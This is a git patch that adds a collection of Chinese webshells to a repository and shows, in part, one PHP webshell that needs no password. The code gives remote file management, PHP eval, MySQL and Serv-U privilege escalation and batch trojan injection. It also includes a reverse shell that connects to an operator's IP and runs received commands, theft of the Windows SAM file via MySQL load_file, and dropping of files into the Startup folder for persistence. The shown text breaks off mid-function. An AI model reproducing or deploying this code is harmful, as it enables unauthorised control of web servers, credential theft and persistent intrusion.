From 2f5e16bfbc189df0c46ca69b88c2cb7dce2dad14 Mon Sep 17 00:00:00 2001
From: tennc <tennc@126.com>
Date: Thu, 23 Oct 2014 15:01:24 +0800
Subject: [PATCH] add 7iyewu  webshell

---
 www-7jyewu-cn/DOC_ZIBSZXBIEG.php              | 2488 +++++++++++++
 www-7jyewu-cn/README.md                       |    6 +
 .../UnKnown 高级Vip防删收费版 (1).asp         | 1746 +++++++++
 www-7jyewu-cn/UnKnown 高级Vip防删收费版.asp   | 1746 +++++++++
 www-7jyewu-cn/aspx经典大马.aspx               | 1553 ++++++++
 www-7jyewu-cn/asp小马.asp                     |  104 +
 .../【批量下载】银河舰队大马_2014版等.zip     |  Bin 0 -> 1229067 bytes
 www-7jyewu-cn/不灭之魂2013改进版本.asp        | 1373 ++++++++
 www-7jyewu-cn/不灭之魂2014改进版本.asp        | 1373 ++++++++
 www-7jyewu-cn/传说中的草泥马4.0 (1).asp       | 1234 +++++++
 www-7jyewu-cn/传说中的草泥马4.0.asp           | 1234 +++++++
 www-7jyewu-cn/免杀php大马.php                 | 2488 +++++++++++++
 www-7jyewu-cn/国外免杀PHP大马_未翻译.php      | 3112 +++++++++++++++++
 www-7jyewu-cn/国外免杀php大马.php             | 3112 +++++++++++++++++
 www-7jyewu-cn/土司搞基asp大马 (1).asp         |  623 ++++
 ...�基asp大马 (1)_重命名_2014-10-23-14-54-16.asp |  623 ++++
 www-7jyewu-cn/土司搞基asp大马.asp             |  623 ++++
 www-7jyewu-cn/拿站小助手-经典Asp小马.asp      |  104 +
 .../星外虚拟机提权专用asp大马 (1).asp         | 1296 +++++++
 ...权专用asp大马 (1)_重命名_2014-10-23-14-54-16.asp | 1296 +++++++
 www-7jyewu-cn/星外虚拟机提权专用asp大马.asp   | 1296 +++++++
 www-7jyewu-cn/最新过安全狗- 免杀PHP大马 -.php | 2488 +++++++++++++
 www-7jyewu-cn/法克僵尸大马 (1).asp            | 2061 +++++++++++
 www-7jyewu-cn/法克僵尸大马.asp                | 2061 +++++++++++
 www-7jyewu-cn/火狐NEW WebShell (1).asp        | 1454 ++++++++
 ... WebShell (1)_重命名_2014-10-23-14-54-16.asp | 1454 ++++++++
 www-7jyewu-cn/火狐NEW WebShell.asp            | 1454 ++++++++
 www-7jyewu-cn/牛逼免杀提权隐藏大马 (1).asp    |  629 ++++
 ...��权隐藏大马 (1)_重命名_2014-10-23-14-54-16.asp |  629 ++++
 www-7jyewu-cn/牛逼免杀提权隐藏大马.asp        |  629 ++++
 www-7jyewu-cn/银河舰队大马_2012版.asp         | 1189 +++++++
 www-7jyewu-cn/银河舰队大马_2014版.asp         | 1189 +++++++
 www-7jyewu-cn/非常牛逼的Jsp大马.jsp           |  994 ++++++
 33 files changed, 43661 insertions(+)
 create mode 100644 www-7jyewu-cn/DOC_ZIBSZXBIEG.php
 create mode 100644 www-7jyewu-cn/README.md
 create mode 100644 www-7jyewu-cn/UnKnown 高级Vip防删收费版 (1).asp
 create mode 100644 www-7jyewu-cn/UnKnown 高级Vip防删收费版.asp
 create mode 100644 www-7jyewu-cn/aspx经典大马.aspx
 create mode 100644 www-7jyewu-cn/asp小马.asp
 create mode 100644 www-7jyewu-cn/【批量下载】银河舰队大马_2014版等.zip
 create mode 100644 www-7jyewu-cn/不灭之魂2013改进版本.asp
 create mode 100644 www-7jyewu-cn/不灭之魂2014改进版本.asp
 create mode 100644 www-7jyewu-cn/传说中的草泥马4.0 (1).asp
 create mode 100644 www-7jyewu-cn/传说中的草泥马4.0.asp
 create mode 100644 www-7jyewu-cn/免杀php大马.php
 create mode 100644 www-7jyewu-cn/国外免杀PHP大马_未翻译.php
 create mode 100644 www-7jyewu-cn/国外免杀php大马.php
 create mode 100644 www-7jyewu-cn/土司搞基asp大马 (1).asp
 create mode 100644 www-7jyewu-cn/土司搞基asp大马 (1)_重命名_2014-10-23-14-54-16.asp
 create mode 100644 www-7jyewu-cn/土司搞基asp大马.asp
 create mode 100644 www-7jyewu-cn/拿站小助手-经典Asp小马.asp
 create mode 100644 www-7jyewu-cn/星外虚拟机提权专用asp大马 (1).asp
 create mode 100644 www-7jyewu-cn/星外虚拟机提权专用asp大马 (1)_重命名_2014-10-23-14-54-16.asp
 create mode 100644 www-7jyewu-cn/星外虚拟机提权专用asp大马.asp
 create mode 100644 www-7jyewu-cn/最新过安全狗- 免杀PHP大马 -.php
 create mode 100644 www-7jyewu-cn/法克僵尸大马 (1).asp
 create mode 100644 www-7jyewu-cn/法克僵尸大马.asp
 create mode 100644 www-7jyewu-cn/火狐NEW WebShell (1).asp
 create mode 100644 www-7jyewu-cn/火狐NEW WebShell (1)_重命名_2014-10-23-14-54-16.asp
 create mode 100644 www-7jyewu-cn/火狐NEW WebShell.asp
 create mode 100644 www-7jyewu-cn/牛逼免杀提权隐藏大马 (1).asp
 create mode 100644 www-7jyewu-cn/牛逼免杀提权隐藏大马 (1)_重命名_2014-10-23-14-54-16.asp
 create mode 100644 www-7jyewu-cn/牛逼免杀提权隐藏大马.asp
 create mode 100644 www-7jyewu-cn/银河舰队大马_2012版.asp
 create mode 100644 www-7jyewu-cn/银河舰队大马_2014版.asp
 create mode 100644 www-7jyewu-cn/非常牛逼的Jsp大马.jsp

diff --git a/www-7jyewu-cn/DOC_ZIBSZXBIEG.php b/www-7jyewu-cn/DOC_ZIBSZXBIEG.php
new file mode 100644
index 0000000..f19f7e8
--- /dev/null
+++ b/www-7jyewu-cn/DOC_ZIBSZXBIEG.php
@@ -0,0 +1,2488 @@
+<?php
+;//无需验证密码！
+$shellname='中国木马资源网- WwW.7jyewu.Cn ';//这里修改标题！
+define('myaddress',__FILE__);
+error_reporting(E_ERROR | E_PARSE);
+header("content-Type: text/html; charset=gb2312");
+@set_time_limit(0);
+
+ob_start();
+define('envlpass',$password);
+define('shellname',$shellname);
+define('myurl',$myurl);
+if(@get_magic_quotes_gpc()){
+	foreach($_POST as $k => $v) $_POST[$k] = stripslashes($v);
+	foreach($_GET as $k => $v) $_GET[$k] = stripslashes($v);
+}
+
+/*---End Login---*/
+if(isset($_GET['down'])) do_down($_GET['down']);
+if(isset($_GET['pack'])){
+	$dir = do_show($_GET['pack']);
+	$zip = new eanver($dir);
+	$out = $zip->out;
+	do_download($out,"eanver.tar.gz");
+}
+if(isset($_GET['unzip'])){
+	css_main();
+	start_unzip($_GET['unzip'],$_GET['unzip'],$_GET['todir']);
+	exit;
+}
+
+define('root_dir',str_replace('\\','/',dirname(myaddress)).'/');
+define('run_win',substr(PHP_OS, 0, 3) == "WIN");
+define('my_shell',str_path(root_dir.$_SERVER['SCRIPT_NAME']));
+$eanver = isset($_GET['eanver']) ? $_GET['eanver'] : "";
+$doing = isset($_POST['doing']) ? $_POST['doing'] : "";
+$path = isset($_GET['path']) ? $_GET['path'] : root_dir;
+$name = isset($_POST['name']) ? $_POST['name'] : "";
+$img = isset($_GET['img']) ? $_GET['img'] : "";
+$p = isset($_GET['p']) ? $_GET['p'] : "";
+$pp = urlencode(dirname($p));
+if($img) css_img($img);
+if($eanver == "phpinfo") die(phpinfo());
+if($eanver == 'logout'){
+	setcookie('envlpass',null);
+	die('<meta http-equiv="refresh" content="0;URL=?">');
+}
+
+$class = array(
+"信息操作" => array("upfiles" => "上传文件","phpinfo" => "基本信息","info_f" => "系统信息","eval" => "执行PHP脚本"),
+"提权工具" => array("sqlshell" => "执行SQL执行","mysql_exec" => "MYSQL操作","myexp" => "MYSQL提权","servu" => "Serv-U提权","nc" => "NC反弹","downloader" => "文件下载","port" => "端口扫描"),
+"批量操作" => array("guama" => "批量挂马清马","tihuan" => "批量替换内容","scanfile" => "批量搜索文件","scanphp" => "批量查找木马"),
+"脚本插件" => array("getcode" => "获取网页源码")
+);
+$msg = array("0" => "保存成功","1" => "保存失败","2" => "上传成功","3" => "上传失败","4" => "修改成功","5" => "修改失败","6" => "删除成功","7" => "删除失败");
+css_main();
+switch($eanver){
+	case "left":
+	css_left();
+		html_n("<dl><dt><a href=\"#\" onclick=\"showHide('items1');\" target=\"_self\">");
+		html_img("title");html_n(" 本地硬盘</a></dt><dd id=\"items1\" style=\"display:block;\"><ul>");
+    $ROOT_DIR = File_Mode();
+    html_n("<li><a title='$ROOT_DIR' href='?eanver=main&path=$ROOT_DIR' target='main'>网站根目录</a></li>");
+	html_n("<li><a href='?eanver=main' target='main'>本程序目录</a></li>");
+	for ($i=66;$i<=90;$i++){$drive= chr($i).':';
+    if (is_dir($drive."/")){$vol=File_Str("vol $drive");if(empty($vol))$vol=$drive;
+    html_n("<li><a title='$drive' href='?eanver=main&path=$drive' target='main'>本地磁盘($drive)</a></li>");}}
+	html_n("</ul></dd></dl>");
+	$i = 2;
+	foreach($class as $name => $array){
+		html_n("<dl><dt><a href=\"#\" onclick=\"showHide('items$i');\" target=\"_self\">");
+		html_img("title");html_n(" $name</a></dt><dd id=\"items$i\" style=\"display:block;\"><ul>");
+		foreach($array as $url => $value){
+			html_n("<li><a href=\"?eanver=$url\" target='main'>$value</a></li>");
+		}
+		html_n("</ul></dd></dl>");
+		$i++;
+	}
+	html_n("<dl><dt><a href=\"#\" onclick=\"showHide('items$i');\" target=\"_self\">");
+	html_img("title");html_n(" 其它操作</a></dt><dd id=\"items$i\" style=\"display:block;\"><ul>");
+	html_n("<li><a title='免杀更新' href='http://www.7jyewu.cn/' target=\"main\">免杀更新</a></li>");
+    html_n("<li><a title='安全退出' href='?eanver=logout' target=\"main\">安全退出</a></li>");
+	html_n("</ul></dd></dl>");
+	html_n("</div>");
+	break;
+	
+	case "main":
+	css_js("1");
+	$dir = @dir($path);
+	$REAL_DIR = File_Str(realpath($path));
+	if(!empty($_POST['actall'])){echo '<div class="actall">'.File_Act($_POST['files'],$_POST['actall'],$_POST['inver'],$REAL_DIR).'</div>';}
+	$NUM_D = $NUM_F = 0;
+	if(!$_SERVER['SERVER_NAME']) $GETURL = ''; else $GETURL = 'http://'.$_SERVER['SERVER_NAME'].'/';
+	$ROOT_DIR = File_Mode();
+	html_n("<table width=\"100%\" border=0 bgcolor=\"#555555\"><tr><td><form method='GET'>地址:<input type='hidden' name='eanver' value='main'>");
+	html_n("<input type='text' size='80' name='path' value='$path'> <input type='submit' value='转到'></form>");
+	html_n("<br><form method='POST' enctype=\"multipart/form-data\" action='?eanver=editr&p=".urlencode($path)."'>");
+	html_n("<input type=\"button\" value=\"新建文件\" onclick=\"rusurechk('newfile.php','?eanver=editr&p=".urlencode($path)."&refile=1&name=');\"> <input type=\"button\" value=\"新建目录\" onclick=\"rusurechk('newdir','?eanver=editr&p=".urlencode($path)."&redir=1&name=');\">");
+	html_input("file","upfilet","","&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ");
+	html_input("submit","uploadt","上传");
+	if(!empty($_POST['newfile'])){
+		if(isset($_POST['bin'])) $bin = $_POST['bin']; else $bin = "wb";
+        if (substr(PHP_VERSION,0,1)>=5){if(($_POST['charset']=='GB2312') or ($_POST['charset']=='GBK')){}else{$_POST['txt'] = iconv("gb2312//IGNORE",$_POST['charset'],$_POST['txt']);}}
+		echo do_write($_POST['newfile'],$bin,$_POST['txt']) ? '<br>'.$_POST['newfile'].' '.$msg[0] : '<br>'.$_POST['newfile'].' '.$msg[1];
+		@touch($_POST['newfile'],@strtotime($_POST['time']));
+	}
+	html_n('</form></td></tr></table><form method="POST" name="fileall" id="fileall" action="?eanver=main&path='.$path.'"><table width="100%" border=0 bgcolor="#555555"><tr height="25"><td width="45%"><b>');
+	html_a('?eanver=main&path='.uppath($path),'<b>上级目录</b>');
+	html_n('</b></td><td align="center" width="10%"><b>操作</b></td><td align="center" width="5%">');
+	html_n('<b>文件属性</b></td><td align="center" width="10%"><b>修改时间</b></td><td align="center" width="10%"><b>文件大小</b></td></tr>');
+	while($dirs = @$dir->read()){
+		if($dirs == '.' or $dirs == '..') continue;
+		$dirpath = str_path("$path/$dirs");
+		if(is_dir($dirpath)){
+			$perm = substr(base_convert(fileperms($dirpath),10,8),-4);
+			$filetime = @date('Y-m-d H:i:s',@filemtime($dirpath));
+			$dirpath = urlencode($dirpath);
+			html_n('<tr height="25"><td><input type="checkbox" name="files[]" value="'.$dirs.'">');
+			html_img("dir");
+			html_a('?eanver=main&path='.$dirpath,$dirs);
+			html_n('</td><td align="center">');
+			html_n("<a href=\"#\" onClick=\"rusurechk('$dirs','?eanver=rename&p=$dirpath&newname=');return false;\">改名</a>");
+			html_n("<a href=\"#\" onClick=\"rusuredel('$dirs','?eanver=deltree&p=$dirpath');return false;\">删除</a> ");
+			html_a('?pack='.$dirpath,'打包');
+			html_n('</td><td align="center">');
+			html_a('?eanver=perm&p='.$dirpath.'&chmod='.$perm,$perm);
+			html_n('</td><td align="center">'.$filetime.'</td><td align="right">');
+			html_n('</td></tr>');
+			$NUM_D++;
+		}
+	}
+	@$dir->rewind();
+	while($files = @$dir->read()){
+		if($files == '.' or $files == '..') continue;
+		$filepath = str_path("$path/$files");
+		if(!is_dir($filepath)){
+			$fsize = @filesize($filepath);
+			$fsize = File_Size($fsize);
+			$perm  = substr(base_convert(fileperms($filepath),10,8),-4);
+			$filetime = @date('Y-m-d H:i:s',@filemtime($filepath));
+			$Fileurls = str_replace(File_Str($ROOT_DIR.'/'),$GETURL,$filepath);
+			$todir=$ROOT_DIR.'/zipfile';
+			$filepath = urlencode($filepath);
+			$it=substr($filepath,-3);
+			html_n('<tr height="25"><td><input type="checkbox" name="files[]" value="'.$files.'">');
+			html_img(css_showimg($files));
+			html_a($Fileurls,$files);
+			html_n('</td><td align="center">');
+            if(($it=='.gz') or ($it=='zip') or ($it=='tar') or ($it=='.7z'))
+			   html_a('?unzip='.$filepath,'解压','title="解压'.$files.'" onClick="rusurechk(\''.$todir.'\',\'?unzip='.$filepath.'&todir=\');return false;"');
+			else
+               html_a('?eanver=editr&p='.$filepath,'编辑','title="编辑'.$files.'"');
+
+			html_n("<a href=\"#\" onClick=\"rusurechk('$files','?eanver=rename&p=$filepath&newname=');return false;\">改名</a>");
+			html_n("<a href=\"#\" onClick=\"rusuredel('$files','?eanver=del&p=$filepath');return false;\">删除</a> ");
+			html_n("<a href=\"#\" onClick=\"rusurechk('".urldecode($filepath)."','?eanver=copy&p=$filepath&newcopy=');return false;\">复制</a>");
+			html_n('</td><td align="center">');
+			html_a('?eanver=perm&p='.$filepath.'&chmod='.$perm,$perm);
+			html_n('</td><td align="center">'.$filetime.'</td><td align="right">');
+			html_a('?down='.$filepath,$fsize,'title="下载'.$files.'"');
+			html_n('</td></tr>');
+			$NUM_F++;
+		}
+	}
+	@$dir->close();
+	if(!$Filetime) $Filetime = gmdate('Y-m-d H:i:s',time() + 3600 * 8);
+print<<<END
+</table>
+<div class="actall"> <input type="hidden" id="actall" name="actall" value="undefined"> 
+<input type="hidden" id="inver" name="inver" value="undefined"> 
+<input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form);"> 
+<input type="button" value="复制" onclick="SubmitUrl('复制所选文件到路径: ','{$REAL_DIR}','a');return false;"> 
+<input type="button" value="删除" onclick="Delok('所选文件','b');return false;"> 
+<input type="button" value="属性" onclick="SubmitUrl('修改所选文件属性值为: ','0666','c');return false;"> 
+<input type="button" value="时间" onclick="CheckDate('{$Filetime}','d');return false;"> 
+<input type="button" value="打包" onclick="SubmitUrl('打包并下载所选文件下载名为: ','{$_SERVER['SERVER_NAME']}.tar.gz','e');return false;">
+目录({$NUM_D}) / 文件({$NUM_F})</div> 
+</form> 
+END;
+	break;
+	
+	case "editr":
+	css_js("2");
+	if(!empty($_POST['uploadt'])){
+		echo @copy($_FILES['upfilet']['tmp_name'],str_path($p.'/'.$_FILES['upfilet']['name'])) ? html_a("?eanver=main",$_FILES['upfilet']['name'].' '.$msg[2]) : msg($msg[3]);
+		die('<meta http-equiv="refresh" content="1;URL=?eanver=main&path='.urlencode($p).'">');
+	}
+	if(!empty($_GET['redir'])){
+        $name=$_GET['name'];
+		$newdir = str_path($p.'/'.$name);
+		@mkdir($newdir,0777) ? html_a("?eanver=main",$name.' '.$msg[0]) : msg($msg[1]);
+		die('<meta http-equiv="refresh" content="1;URL=?eanver=main&path='.urlencode($p).'">');
+	}
+
+	if(!empty($_GET['refile'])){
+        $name=$_GET['name'];
+		$jspath=urlencode($p.'/'.$name);
+		$pp = urlencode($p);
+		$p = str_path($p.'/'.$name);
+		$FILE_CODE = "";
+		$charset= 'GB2312';
+        $FILE_TIME =date('Y-m-d H:i:s',time()+3600*8);
+		if(@file_exists($p)) echo '发现目录下有"同名"文件<br>';
+	}else{
+		$jspath=urlencode($p);
+		$FILE_TIME = date('Y-m-d H:i:s',filemtime($p));
+        $FILE_CODE=@file_get_contents($p);
+	     if (substr(PHP_VERSION,0,1)>=5){
+            if(empty($_GET['charset'])){
+			   if(TestUtf8($FILE_CODE)>1){$charset= 'UTF-8';$FILE_CODE = iconv("UTF-8","gb2312//IGNORE",$FILE_CODE);}else{$charset= 'GB2312';}
+			  }else{
+			   if($_GET['charset']=='GB2312'){$charset= 'GB2312';}else{$charset= $_GET['charset'];$FILE_CODE = iconv($_GET['charset'],"gb2312//IGNORE",$FILE_CODE);}
+			  }
+		  }
+        $FILE_CODE = htmlspecialchars($FILE_CODE);
+	}
+print<<<END
+<div class="actall">查找内容: <input name="searchs" type="text" value="{$dim}" style="width:500px;">
+<input type="button" value="查找" onclick="search(searchs.value)"></div>
+<form method='POST' id="editor"  action='?eanver=main&path={$pp}'>
+<div class="actall">
+<input type="text" name="newfile"  id="newfile" value="{$p}" style="width:750px;">指定编码：<input name="charset" id="charset" value="{$charset}" Type="text" style="width:80px;" onkeydown="if(event.keyCode==13)window.location='?eanver=editr&p={$jspath}&charset='+this.value;">
+<input type="button" value="选择" onclick="window.location='?eanver=editr&p={$jspath}&charset='+this.form.charset.value;" style="width:50px;"> 
+END;
+html_select(array("GB2312" => "GB2312","UTF-8" => "UTF-8","BIG5" => "BIG5","EUC-KR" => "EUC-KR","EUC-JP" => "EUC-JP","SHIFT-JIS" => "SHIFT-JIS","WINDOWS-874" => "WINDOWS-874","ISO-8859-1" => "ISO-8859-1"),$charset,"onchange=\"window.location='?eanver=editr&p={$jspath}&charset='+options[selectedIndex].value;\"");
+print<<<END
+</div>
+<div class="actall"><textarea name="txt" style="width:100%;height:380px;">{$FILE_CODE}</textarea></div>
+<div class="actall">文件修改时间 <input type="text" name="time" id="mtime" value="{$FILE_TIME}" style="width:150px;"> <input type="checkbox" name="bin" value="wb+" size="" checked>以二进制形式保存文件(建议使用)</div>
+<div class="actall"><input type="button" value="保存" onclick="CheckDate();" style="width:80px;"> <input name='reset' type='reset' value='重置'> 
+<input type="button" value="返回" onclick="window.location='?eanver=main&path={$pp}';" style="width:80px;"></div>
+</form>
+END;
+	break;
+	
+	case "rename":
+	html_n("<tr><td>");
+	$newname = urldecode($pp).'/'.urlencode($_GET['newname']);
+	@rename($p,$newname) ? html_a("?eanver=main&path=$pp",urlencode($_GET['newname']).' '.$msg[4]) : msg($msg[5]);
+	die('<meta http-equiv="refresh" content="1;URL=?eanver=main&path='.$pp.'">');
+	break;
+	
+	case "deltree":
+	html_n("<tr><td>");
+	do_deltree($p) ? html_a("?eanver=main&path=$pp",$p.' '.$msg[6]) : msg($msg[7]);
+	die('<meta http-equiv="refresh" content="1;URL=?eanver=main&path='.$pp.'">');
+	break;
+	
+	case "del":
+	html_n("<tr><td>");
+	@unlink($p) ? html_a("?eanver=main&path=$pp",$p.' '.$msg[6]) : msg($msg[7]);
+	die('<meta http-equiv="refresh" content="1;URL=?eanver=main&path='.$pp.'">');
+	break;
+	
+	case "copy":
+	html_n("<tr><td>");
+	$newpath = explode('/',$_GET['newcopy']);
+	$pathr[0] = $newpath[0];
+	for($i=1;$i < count($newpath);$i++){
+		$pathr[] = urlencode($newpath[$i]);
+	}
+	$newcopy = implode('/',$pathr);
+	@copy($p,$newcopy) ? html_a("?eanver=main&path=$pp",$newcopy.' '.$msg[4]) : msg($msg[5]);
+	die('<meta http-equiv="refresh" content="1;URL=?eanver=main&path='.$pp.'">');
+	break;
+	
+	case "perm":
+	html_n("<form method='POST'><tr><td>".$p.' 属性为: ');
+	if(is_dir($p)){
+		html_select(array("0777" => "0777","0755" => "0755","0555" => "0555"),$_GET['chmod']);
+	}else{
+		html_select(array("0666" => "0666","0644" => "0644","0444" => "0444"),$_GET['chmod']);
+	}
+	html_input("submit","save","修改");
+	back();
+	if($_POST['class']){
+		switch($_POST['class']){
+			case "0777": $change = @chmod($p,0777); break;
+			case "0755": $change = @chmod($p,0755); break;
+			case "0555": $change = @chmod($p,0555); break;
+			case "0666": $change = @chmod($p,0666); break;
+			case "0644": $change = @chmod($p,0644); break;
+			case "0444": $change = @chmod($p,0444); break;
+		}
+		$change ? html_a("?eanver=main&path=$pp",$msg[4]) : msg($msg[5]);
+		die('<meta http-equiv="refresh" content="1;URL=?eanver=main&path='.$pp.'">');
+	}
+	html_n("</td></tr></form>");
+	break;
+
+    case "info_f":
+	$dis_func = get_cfg_var("disable_functions");
+	$upsize = get_cfg_var("file_uploads") ? get_cfg_var("upload_max_filesize") : "不允许上传";
+	$adminmail = (isset($_SERVER['SERVER_ADMIN'])) ? "<a href=\"mailto:".$_SERVER['SERVER_ADMIN']."\">".$_SERVER['SERVER_ADMIN']."</a>" : "<a href=\"mailto:".get_cfg_var("sendmail_from")."\">".get_cfg_var("sendmail_from")."</a>";
+	if($dis_func == ""){$dis_func = "No";}else{$dis_func = str_replace(" ","<br>",$dis_func);$dis_func = str_replace(",","<br>",$dis_func);}
+	$phpinfo = (!eregi("phpinfo",$dis_func)) ? "Yes" : "No";
+	$info = array(
+		array("服务器时间",date("Y年m月d日 h:i:s",time())),
+		array("服务器域名","<a href=\"http://".$_SERVER['SERVER_NAME']."\" target=\"_blank\">".$_SERVER['SERVER_NAME']."</a>"),
+		array("服务器IP地址",gethostbyname($_SERVER['SERVER_NAME'])),
+		array("服务器操作系统",PHP_OS),
+		array("服务器操作系统文字编码",$_SERVER['HTTP_ACCEPT_LANGUAGE']),
+		array("服务器解译引擎",$_SERVER['SERVER_SOFTWARE']),
+		array("你的IP",$_SERVER["REMOTE_ADDR"]),
+		array("Web服务端口",$_SERVER['SERVER_PORT']),
+		array("PHP运行方式",strtoupper(php_sapi_name())),
+		array("PHP版本",PHP_VERSION),
+		array("运行于安全模式",Info_Cfg("safemode")),
+		array("服务器管理员",$adminmail),
+		array("本文件路径",myaddress),
+		array("允许使用 URL 打开文件 allow_url_fopen",Info_Cfg("allow_url_fopen")),
+		array("允许使用curl_exec",Info_Fun("curl_exec")),
+		array("允许动态加载链接库 enable_dl",Info_Cfg("enable_dl")),
+		array("显示错误信息 display_errors",Info_Cfg("display_errors")),
+		array("自动定义全局变量 register_globals",Info_Cfg("register_globals")),
+		array("magic_quotes_gpc",Info_Cfg("magic_quotes_gpc")),
+		array("程序最多允许使用内存量 memory_limit",Info_Cfg("memory_limit")),
+		array("POST最大字节数 post_max_size",Info_Cfg("post_max_size")),
+		array("允许最大上传文件 upload_max_filesize",$upsize),
+		array("程序最长运行时间 max_execution_time",Info_Cfg("max_execution_time")."秒"),
+		array("被禁用的函数 disable_functions",$dis_func),
+		array("phpinfo()",$phpinfo),
+		array("目前还有空余空间diskfreespace",intval(diskfreespace(".") / (1024 * 1024)).'Mb'),
+		array("图形处理 GD Library",Info_Fun("imageline")),
+		array("IMAP电子邮件系统",Info_Fun("imap_close")),
+		array("MySQL数据库",Info_Fun("mysql_close")),
+		array("SyBase数据库",Info_Fun("sybase_close")),
+		array("Oracle数据库",Info_Fun("ora_close")),
+		array("Oracle 8 数据库",Info_Fun("OCILogOff")),
+		array("PREL相容语法 PCRE",Info_Fun("preg_match")),
+		array("PDF文档支持",Info_Fun("pdf_close")),
+		array("Postgre SQL数据库",Info_Fun("pg_close")),
+		array("SNMP网络管理协议",Info_Fun("snmpget")),
+		array("压缩文件支持(Zlib)",Info_Fun("gzclose")),
+		array("XML解析",Info_Fun("xml_set_object")),
+		array("FTP",Info_Fun("ftp_login")),
+		array("ODBC数据库连接",Info_Fun("odbc_close")),
+		array("Session支持",Info_Fun("session_start")),
+		array("Socket支持",Info_Fun("fsockopen")),
+	);
+	$shell = new COM("WScript.Shell") or die("This thing requires Windows Scripting Host");
+	echo '<table width="100%" border="0">';
+	for($i = 0;$i < count($info);$i++){echo '<tr><td width="40%">'.$info[$i][0].'</td><td>'.$info[$i][1].'</td></tr>'."\n";}
+try{$registry_proxystring = $shell->RegRead("HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Wds\\rdpwd\\Tds\\tcp\PortNumber");
+$Telnet = $shell->RegRead("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\TelnetServer\\1.0\\TelnetPort");
+$PcAnywhere = $shell->RegRead("HKEY_LOCAL_MACHINE\\SOFTWARE\\Symantec\\pcAnywhere\\CurrentVersion\\System\\TCPIPDataPort");
+}catch(Exception $e){}
+    echo '<tr><td width="40%">Terminal Service端口为</td><td>'.$registry_proxystring.'</td></tr>'."\n";
+	echo '<tr><td width="40%">Telnet端口为</td><td>'.$Telnet.'</td></tr>'."\n";
+	echo '<tr><td width="40%">PcAnywhere端口为</td><td>'.$PcAnywhere.'</td></tr>'."\n";
+	echo '</table>';
+	break;
+
+	case "nc":
+	$M_ip = isset($_POST['mip']) ? $_POST['mip'] : $_SERVER["REMOTE_ADDR"];
+	$B_port = isset($_POST['bport']) ? $_POST['bport'] : '1019';
+print<<<END
+<form method="POST">
+<div class="actall">使用方法：<br>
+			先在自己电脑运行"nc -l -p 1019"<br>
+			然后在此填写你电脑的IP,点连接！</div>
+<div class="actall">你的IP <input type="text" name="mip" value="{$M_ip}" style="width:100px;"> 端口号 <input type="text" name="bport" value="{$B_port}" style="width:50px;"></div>
+<div class="actall"><input type="submit" value="连接" style="width:80px;"></div>
+</form>
+END;
+	if((!empty($_POST['mip'])) && (!empty($_POST['bport'])))
+	{
+	echo '<div class="actall">';
+		 $mip=$_POST['mip'];
+		 $bport=$_POST['bport'];
+		 $fp=fsockopen($mip , $bport , $errno, $errstr);
+		 if (!$fp){
+		     $result = "Error: could not open socket connection";
+		    }else {
+		 fputs ($fp ,"\n*********************************************\n 
+		              hacking url:http://www.7jyewu.cn/ is ok!        
+			          \n*********************************************\n\n");
+	     while(!feof($fp)){ 
+         fputs ($fp," [r00t@H4c3ing:/root]# ");
+         $result= fgets ($fp, 4096);
+         $message=`$result`;
+         fputs ($fp,"--> ".$message."\n");
+                          }
+         fclose ($fp);
+		       }
+    echo '</div>';
+    }
+	break;
+
+
+	case "sqlshell":
+	$MSG_BOX = '';
+	$mhost = 'localhost'; $muser = 'root'; $mport = '3306'; $mpass = ''; $mdata = 'mysql'; $msql = 'select version();';
+	if(isset($_POST['mhost']) && isset($_POST['muser']))
+	{
+		$mhost = $_POST['mhost']; $muser = $_POST['muser']; $mpass = $_POST['mpass']; $mdata = $_POST['mdata']; $mport = $_POST['mport'];
+		if($conn = mysql_connect($mhost.':'.$mport,$muser,$mpass)) @mysql_select_db($mdata);
+		else $MSG_BOX = '连接MYSQL失败';
+	}
+	$downfile = 'c:/windows/repair/sam';
+	if(!empty($_POST['downfile']))
+	{
+		$downfile = File_Str($_POST['downfile']);
+		$binpath = bin2hex($downfile);
+		$query = 'select load_file(0x'.$binpath.')';
+		if($result = @mysql_query($query,$conn))
+		{
+			$k = 0; $downcode = '';
+			while($row = @mysql_fetch_array($result)){$downcode .= $row[$k];$k++;}
+			$filedown = basename($downfile);
+			if(!$filedown) $filedown = 'envl.tmp';
+			$array = explode('.', $filedown);
+			$arrayend = array_pop($array);
+			header('Content-type: application/x-'.$arrayend);
+			header('Content-Disposition: attachment; filename='.$filedown);
+			header('Content-Length: '.strlen($downcode));
+			echo $downcode;
+			exit;
+		}
+		else $MSG_BOX = '下载文件失败';
+	}
+	$o = isset($_GET['o']) ? $_GET['o'] : '';
+print<<<END
+<form method="POST" name="nform" id="nform">
+<center><div class="actall"><a href="?eanver=sqlshell">[MYSQL执行语句]</a> 
+<a href="?eanver=sqlshell&o=u">[MYSQL上传文件]</a> 
+<a href="?eanver=sqlshell&o=d">[MYSQL下载文件]</a></div>
+<div class="actall">
+地址 <input type="text" name="mhost" value="{$mhost}" style="width:110px">
+端口 <input type="text" name="mport" value="{$mport}" style="width:110px">
+用户 <input type="text" name="muser" value="{$muser}" style="width:110px">
+密码 <input type="text" name="mpass" value="{$mpass}" style="width:110px">
+库名 <input type="text" name="mdata" value="{$mdata}" style="width:110px">
+</div>
+<div class="actall" style="height:220px;">
+END;
+if($o == 'u')
+{
+	$uppath = 'C:/Documents and Settings/All Users/「开始」菜单/程序/启动/exp.vbs';
+	if(!empty($_POST['uppath']))
+	{
+		$uppath = $_POST['uppath'];
+		$query = 'Create TABLE a (cmd text NOT NULL);';
+		if(@mysql_query($query,$conn))
+		{
+			if($tmpcode = File_Read($_FILES['upfile']['tmp_name'])){$filecode = bin2hex(File_Read($tmpcode));}
+			else{$tmp = File_Str(dirname(myaddress)).'/upfile.tmp';if(File_Up($_FILES['upfile']['tmp_name'],$tmp)){$filecode = bin2hex(File_Read($tmp));@unlink($tmp);}}
+			$query = 'Insert INTO a (cmd) VALUES(CONVERT(0x'.$filecode.',CHAR));';
+			if(@mysql_query($query,$conn))
+			{
+				$query = 'SELECT cmd FROM a INTO DUMPFILE \''.$uppath.'\';';
+				$MSG_BOX = @mysql_query($query,$conn) ? '上传文件成功' : '上传文件失败';
+			}
+			else $MSG_BOX = '插入临时表失败';
+			@mysql_query('Drop TABLE IF EXISTS a;',$conn);
+		}
+		else $MSG_BOX = '创建临时表失败';
+	}
+print<<<END
